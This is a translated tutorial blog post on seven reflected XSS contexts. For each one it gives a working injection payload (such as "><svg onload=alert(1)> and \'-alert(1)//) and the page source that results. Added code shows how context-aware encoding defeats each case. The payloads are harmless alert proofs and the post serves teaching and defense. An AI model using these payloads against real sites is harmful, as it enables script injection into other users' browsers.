Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


7 XSS usage scenarios you should know

Posted by fleschner at 2020-03-21

The 7 main XSS cases everyone should know

Translator: LeBor

When reading XSS related articles, we usually see the classic pop-up payload, <script>alert(1)</script>. Although it is correct, it is rather limited and not enough for novices to deal with the different scenarios found in real pages.


Here are 7 XSS exploitation scenarios that everyone should know.

Test environment: http://

At the beginning of the page source there is an HTML comment listing all the parameters that trigger each case. All of them work with both GET and POST requests.

You may notice that in all cases the input payload can be seen in the source code of the HTTP response. Whether the XSS is reflected or stored does not matter here; the important thing is where the output appears and what is allowed there. For convenience, reflected XSS is used for every case. DOM-based XSS is outside the scope of this discussion.

Remember not to test these cases in a browser with an XSS filtering mechanism; use Firefox instead.

1. URL reflection

When the URL is reflected in the page source in some way, we can append our own XSS payload to it. For PHP pages, you can use the slash character (/) to append anything to the page name without changing the page that is served.

Payload: "><svg onload=alert(1)>

Page source:

<!-- URL Reflection -->
<form action="/xss.php/"><svg onload=alert(1)>" method="POST">
<br>

The cause differs from language to language (the reflection may appear in the URL path or in a parameter). For PHP, the main culprit is the use of the global variable $_SERVER["PHP_SELF"] in the action attribute of the submitted form.


2. Simple HTMLi (HTML injection)

The simplest and most direct XSS: the input lands directly in the HTML body, so there is no need to close or escape any characters before or after the tag. Any XSS payload of the form <tag handler=jsCode> works.

Payload: <svg onload=alert(1)>

Page source:

<!-- Simple HTMLi -->
Hello, <svg onload=alert(1)>!
<br>

3. Inline HTMLi

It is as simple as the previous one, but the input lands inside a tag (in an attribute value), so we need "> to close the current tag first.

Payload: "><svg onload=alert(1)>

Page source:

<!-- Inline HTMLi (Double Quotes) -->
<input type="text" name="b1" value=""><svg onload=alert(1)>">
<br>

4. Inline HTMLi: without breaking the tag

When the angle brackets in the input are HTML-encoded, we cannot close the current tag as we did in the previous case.

Page source:

<!-- Inline HTMLi - No Tag Breaking (Double Quotes) -->
<input type="text" name="b3" value=""&gt;<svg onload=alert(1)&gt;">
<br>

In this case, you need a payload based on an on* event handler to exploit the XSS.

Payload: " onmouseover=alert(1)//

You can see from the page source that the value attribute is closed, which leaves room for an onmouseover event handler pointing to alert(1), while the trailing // comments out the remaining ">. The JavaScript pop-up is triggered when the victim moves the mouse over or clicks the affected field.

Page source:

<!-- Inline HTMLi - No Tag Breaking (Double Quotes) -->
<input type="text" name="b3" value="" onmouseover=alert(1)//">
<br>
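The defender's side of cases 1 to 4 is output encoding that matches the HTML context the value lands in. The following is an added example written for this page, not code from the original post or its test environment: renderFormAction, renderGreeting, renderInput and attrContextBroken are hypothetical helpers that rebuild the post's page fragments around a user-controlled value, and the payloads are the constructed inputs from the four cases above. It puts the case-4 style filter (angle brackets encoded, quotes left alone) next to a full HTML encoder.

```javascript
// Added example (not part of the original post): context-aware output encoding
// for the HTML contexts of cases 1-4, next to the incomplete filter of case 4.
// renderFormAction / renderGreeting / renderInput / attrContextBroken are
// hypothetical helpers written for this illustration.

// Case-4 style filter: encodes only the angle brackets. The double quote that
// closes the attribute value is untouched, so " onmouseover=alert(1)// escapes it.
function weakAttrFilter(value) {
  return String(value).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Full HTML encoder, safe for text nodes (case 2) and for quoted attribute
// values (cases 1, 3 and 4). Every character with a meaning in HTML is replaced;
// & is in the set so entities already present in the input are not passed through.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// The page fragments from the post, with the user-controlled part run through an encoder.
function renderFormAction(path, encoder) {      // case 1: action="/xss.php/<input>"
  return `<form action="/xss.php/${encoder(path)}" method="POST">`;
}
function renderGreeting(name, encoder) {        // case 2: Hello, <input>!
  return `Hello, ${encoder(name)}!`;
}
function renderInput(name, value, encoder) {    // cases 3 and 4: value="<input>"
  return `<input type="text" name="${name}" value="${encoder(value)}">`;
}

// Illustrative check, not an HTML parser: blank out the one quoted attribute the
// value was meant to stay in, then look for an event-handler attribute or a new
// tag start that is now sitting outside it.
function attrContextBroken(tag, attr) {
  const rest = tag.replace(new RegExp(attr + '="[^"]*"'), attr + '=""');
  return /\son\w+\s*=|<[a-z]/i.test(rest.slice(1)); // slice(1) skips the tag's own <
}

// Constructed inputs: the payloads the post uses for cases 1-4.
const PAYLOADS = {
  urlReflection: '"><svg onload=alert(1)>',
  simpleHtmli:   '<svg onload=alert(1)>',
  inlineHtmli:   '"><svg onload=alert(1)>',
  noTagBreaking: '" onmouseover=alert(1)//',
};

const identity = v => v; // no encoding at all, as in cases 1-3

function demo() {
  return {
    // case 1: raw reflection breaks out of the form's action attribute, encoded does not
    formRaw:     attrContextBroken(renderFormAction(PAYLOADS.urlReflection, identity), 'action'),
    formEncoded: attrContextBroken(renderFormAction(PAYLOADS.urlReflection, encodeHtml), 'action'),
    // case 2: in the body context the encoded tag is just text
    greeting:    renderGreeting(PAYLOADS.simpleHtmli, encodeHtml),
    // case 3: raw reflection closes the value attribute and starts a new tag
    inputRaw:    attrContextBroken(renderInput('b1', PAYLOADS.inlineHtmli, identity), 'value'),
    // case 4: the weak filter still lets the quote out; the full encoder does not
    inputWeak:   attrContextBroken(renderInput('b3', PAYLOADS.noTagBreaking, weakAttrFilter), 'value'),
    inputFull:   attrContextBroken(renderInput('b3', PAYLOADS.noTagBreaking, encodeHtml), 'value'),
  };
}
```

The practical lesson is that a filter which only touches < and > addresses case 3 but not case 4; the quote character is what delimits the attribute, so it has to be in the encoded set, and & has to be encoded as well so the encoder's own entities cannot be undone by entities the attacker supplies.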

5. HTMLi in JS

Sometimes the input lands inside JavaScript (a script tag), usually as the value of a variable in the code.


But the browser parses HTML tags before it parses the JavaScript, so we can terminate the script tag and then insert a new tag of our own.

Payload: </script><svg onload=alert(1)>

Page source:

<script>
// HTMLi in Js Block (Single Quotes)
var c1 = '</script><svg onload=alert(1)>';

6. Simple JS injection

If the script tag is filtered, the previous exploitation fails.

Page source:

<script>
// Simple Js Injection
var var3 = '><svg onload=alert(1)>';

So we need to inject JavaScript code that respects the syntax of the surrounding script.


We concatenate the value of the vulnerable variable with the payload we want to execute: close the quote so it no longer contains our code, concatenate our code with a minus sign, and then do the reverse (concatenate again and reopen the quote) so that the result is valid JavaScript syntax.

Payload: '-alert(1)-'

Page source:

<script>
// Simple Js Injection (Single Quotes)
var c3 = ''-alert(1)-'';

7. Escaped JS injection

In the previous case, if the single quote is escaped with a backslash, the injected payload does not work.

Page source:

<script>
// Simple Js Injection (Single Quotes)
var c3 = '\'-alert(1)-\'';

There is a small trick for this problem: escape the escape character. We insert a backslash of our own, which escapes the backslash the program adds, so the single quote is left unescaped and closes the string. After concatenating our JS code, we comment out the rest of the line with //.

Payload: \'-alert(1)//

Page source:

<script>
// Escaped Js Injection (Single Quotes)
var c5 = '\\'-alert(1)//';
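Cases 5 to 7 are all about the same output context, a single-quoted JavaScript string literal inside a script block, and the quote-only escaping that case 7 defeats is exactly the fix that case 6 seems to call for. The following is an added example written for this page, not code from the original post: quoteOnlyEscape stands for that incomplete filter, encodeJsString is a full escaper for the context, and renderScript, literalClosesEarly and bodyEndsScriptTag are hypothetical helpers written for this illustration; the payloads are the constructed inputs from the three cases above.

```javascript
// Added example (not part of the original post): output encoding for the
// JavaScript string context of cases 5-7, with the quote-only escaping that
// case 7 bypasses shown beside a full escaper. renderScript, literalClosesEarly
// and bodyEndsScriptTag are hypothetical helpers written for this illustration.

// Quote-only escaping, the filter case 7 bypasses: ' becomes \' but a backslash
// in the input is left alone, so an input of \' turns into \\' and the input's
// backslash consumes the one the filter added.
function quoteOnlyEscape(value) {
  return String(value).replace(/'/g, "\\'");
}

// Full escaper for a single-quoted JS string literal. The backslash is in the
// set, so an input backslash can no longer pair with the escape we add; < and >
// become \x3c / \x3e so the HTML parser never finds </script> inside the literal
// (case 5); line terminators are escaped because they would also end the literal.
const JS_ESCAPES = {
  '\\': '\\\\', "'": "\\'", '"': '\\"', '<': '\\x3c', '>': '\\x3e',
  '\n': '\\n', '\r': '\\r', '\u2028': '\\u2028', '\u2029': '\\u2029',
};
function encodeJsString(value) {
  return String(value).replace(/[\\'"<>\n\r\u2028\u2029]/g, ch => JS_ESCAPES[ch]);
}

// The script block from the post, with the variable value run through an encoder.
function renderScript(varName, value, encoder) {
  return `<script>\nvar ${varName} = '${encoder(value)}';\n</script>`;
}

// Walks the body of a single-quoted literal the way the JS tokenizer does: a
// backslash escapes the next character, an unescaped ' ends the literal. True
// means the input closed the string early and whatever follows runs as code.
function literalClosesEarly(body) {
  for (let i = 0; i < body.length; i++) {
    if (body[i] === '\\') { i += 1; continue; } // skip the escaped character
    if (body[i] === "'") return true;
  }
  return false;
}

// True if the HTML parser would find an end tag for <script> in the literal
// body. The HTML parser runs first and knows nothing about JS quoting (case 5).
function bodyEndsScriptTag(body) {
  return /<\/script/i.test(body);
}

// Constructed inputs: the payloads the post uses for cases 5, 6 and 7.
const PAYLOADS = {
  htmliInJs:  '</script><svg onload=alert(1)>',
  simpleJsi:  "'-alert(1)-'",
  escapedJsi: "\\'-alert(1)//",
};

function demo() {
  return {
    // case 5: only the full escaper hides </script> from the HTML parser
    scriptEndQuoteOnly: bodyEndsScriptTag(quoteOnlyEscape(PAYLOADS.htmliInJs)),
    scriptEndFull:      bodyEndsScriptTag(encodeJsString(PAYLOADS.htmliInJs)),
    // case 6: quote-only escaping is enough against a plain quote
    simpleQuoteOnly:    literalClosesEarly(quoteOnlyEscape(PAYLOADS.simpleJsi)),
    // case 7: the input's backslash defeats quote-only escaping; the full escaper holds
    escapedQuoteOnly:   literalClosesEarly(quoteOnlyEscape(PAYLOADS.escapedJsi)),
    escapedFull:        literalClosesEarly(encodeJsString(PAYLOADS.escapedJsi)),
    rendered:           renderScript('c5', PAYLOADS.escapedJsi, encodeJsString),
  };
}
```

Two points are worth keeping in mind when reviewing such code: the backslash has to be escaped before (or in the same pass as) the quote, otherwise the escaper's own backslashes get doubled by the attacker's, which is the whole of case 7; and escaping angle brackets in the JS layer is what prevents case 5, because no amount of JS quoting stops the HTML parser from ending the script element at the first </script> it sees.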

PS: if any part of the translation is off, please give me more advice.